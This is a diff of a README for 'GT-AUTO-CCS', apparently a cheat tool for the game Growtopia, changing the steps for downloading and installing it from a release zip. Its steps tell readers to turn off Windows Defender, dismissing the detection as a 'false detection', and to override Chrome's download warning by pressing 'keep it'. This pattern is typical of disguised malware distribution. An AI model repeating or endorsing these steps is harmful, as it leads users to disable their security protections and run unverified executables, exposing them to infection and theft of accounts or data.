RealGoblinss/GT-AUTO-CCS/README.md

 ## How to download & install
 1. Turn off windows defender, because Auto-CCS changes Growtopia code and gets detected as a false detection.
-2. Simply follow this link: https://github.com/RealGoblinss/GT-AUTO-CCS
+2. Simply follow this link: https://github.com/RealGoblinss/GT-AUTO-CCS/releases/tag/auto-ccs
-3. (If necessary) Do ctrl + J (chrome) and press keep it
+3. Download the zip file
-4. Unzip it with WinRar (right click -> extract to...) enjoy!
+4.(If necessary) Do ctrl + J (chrome) and press keep it 5..
+Unzip it with WinRar (right click -> extract to...) enjoy!

 # Contact: